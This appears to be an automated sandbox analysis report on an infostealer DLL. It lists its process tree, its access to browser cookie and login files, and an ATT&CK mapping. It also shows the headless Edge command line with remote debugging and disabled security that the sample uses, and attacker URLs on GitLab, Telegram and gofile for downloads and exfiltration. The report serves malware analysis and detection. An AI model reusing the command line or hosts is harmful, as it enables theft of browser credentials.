        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2microsoft-hyper-v-client-migration-replacement.manP%b
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +microsoft-hyper-v-migration-replacement.manP%b
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.manX[
        Source: rundll32.exe, 00000003.00000003.3106798067.0000025C6F362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3109018207.0000025C6F363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3537952919.00000249738C0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000005.00000002.1729770503.000002D27E42B000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1735888494.000001CD9742B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.2562209285.00000277837A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2A9AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFDFF2A9AC0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2A9AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFDFF2A9AC0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF29B728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FFDFF29B728

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.12.205 0Jump to behavior
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 208.95.112.1 0Jump to behavior
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.65.251.78 0Jump to behavior
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.13.205 0Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1Jump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9928 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9470 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9459 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9909 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9834 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9526 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9949 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior

        Language, Device and Operating System Detection

        barindex
        Source: Yara matchFile source: mP8rzGD7fG.dll, type: SAMPLE
        Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00007FFDF9C725D4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_00007FFDF9C725D4

        Stealing of Sensitive Information

        barindex
        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724362535454058\FilesJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724362535454058\Files\DJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724362595132842\FilesJump to behavior
        Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724362595132842\Files\DJump to behavior
        Source: Yara matchFile source: 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7560, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9856 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        111
        Process Injection
        21
        Masquerading
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        21
        Virtualization/Sandbox Evasion
        LSASS Memory21
        Security Software Discovery
        Remote Desktop Protocol11
        Data from Local System
        1
        Remote Access Software
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
        Process Injection
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information
        NTDS1
        System Network Configuration Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information
        LSA Secrets1
        File and Directory Discovery
        SSHKeylogging3
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Rundll32
        Cached Domain Credentials3
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590663 Sample: mP8rzGD7fG.dll Startdate: 14/01/2025 Architecture: WINDOWS Score: 84 62 ip-api.com 2->62 64 gitlab.com 2->64 66 api.ipify.org 2->66 78 Multi AV Scanner detection for submitted file 2->78 80 Yara detected Telegram Recon 2->80 82 Drops password protected ZIP file 2->82 84 Sigma detected: Potential Data Stealing Via Chromium Headless Debugging 2->84 10 loaddll64.exe 1 2->10         started        signatures3 process4 process5 12 rundll32.exe 14 10->12         started        16 rundll32.exe 15 10->16         started        19 cmd.exe 1 10->19         started        21 3 other processes 10->21 dnsIp6 70 104.26.12.205, 443, 50069, 50070 CLOUDFLARENETUS United States 12->70 86 System process connects to network (likely due to code injection or exploit) 12->86 88 Attempt to bypass Chrome Application-Bound Encryption 12->88 23 msedge.exe 4 12->23         started        25 msedge.exe 12->25         started        27 msedge.exe 12->27         started        72 ip-api.com 208.95.112.1, 49964, 49976, 50071 TUT-ASUS United States 16->72 74 api.ipify.org 104.26.13.205, 443, 49956, 49962 CLOUDFLARENETUS United States 16->74 76 gitlab.com 172.65.251.78, 443, 49933 CLOUDFLARENETUS United States 16->76 60 C:\Windows\System32\e_sqlite3.dll, PE32+ 16->60 dropped 90 Tries to harvest and steal browser information (history, passwords, etc) 16->90 29 msedge.exe 4 16->29         started        31 msedge.exe 16->31         started        33 msedge.exe 16->33         started        35 rundll32.exe 1 19->35         started        38 WerFault.exe 20 16 21->38         started        40 WerFault.exe 16 21->40         started        file7 signatures8 process9 dnsIp10 42 msedge.exe 23->42         started        44 msedge.exe 25->44         started        46 msedge.exe 27->46         started        48 msedge.exe 29->48         started        50 msedge.exe 31->50         started        52 msedge.exe 33->52         started        68 127.0.0.1 unknown unknown 35->68 54 msedge.exe 4 35->54         started        56 msedge.exe 35->56         started        process11 process12 58 msedge.exe 54->58         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        mP8rzGD7fG.dll33%VirustotalBrowse
        mP8rzGD7fG.dll47%ReversingLabsWin32.Trojan.Generic
        SourceDetectionScannerLabelLink
        C:\Windows\System32\e_sqlite3.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://api.ipify.orgP%b0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        gitlab.com
        172.65.251.78
        truefalse
          high
          api.ipify.org
          104.26.13.205
          truefalse
            high
            ip-api.com
            208.95.112.1
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                high
                https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=falsefalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://github.com/mono/linker/issues/1731rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                    high
                    https://github.com/mono/linker/issues/2025rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                      high
                      https://github.com/mono/linker/pull/2125.rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                        high
                        https://github.com/mono/linker/issues/1895vUsingrundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                          high
                          https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inrundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                            high
                            http://www.chambersign.org1msedge.exe, 00000006.00000002.1737932930.0000538C0006C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://system.data.sqlite.org/Xrundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                high
                                https://www.newtonsoft.com/jsonrundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpfalse
                                  high
                                  http://ip-api.com/json/yrundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidP%brundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                      high
                                      https://api.gofile.io/serversP%brundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                        high
                                        https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falseP%brundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                          high
                                          https://github.com/dotnet/runtimerundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                            high
                                            https://api.telegram.org/botP%brundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                              high
                                              https://api.ipify.orgP%brundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYrundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                high
                                                http://ip-api.com:80/rundll32.exe, 00000003.00000002.3108264897.0000021BDB58E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://aka.ms/dotnet-warnings/rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/wsdl/P%brundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                      high
                                                      https://github.com/dotnet/efcorerundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        high
                                                        https://aka.ms/nativeaot-compatibilityP%brundll32.exe, 0000000E.00000002.2575981932.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/wsdl/irundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                            high
                                                            https://aka.ms/nativeaot-compatibilityrundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                              high
                                                              http://ip-api.com/json/8.46.123.189rundll32.exe, 00000003.00000002.3108264897.0000021BDB58E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/serializationformat-binary-obsoleterundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                  high
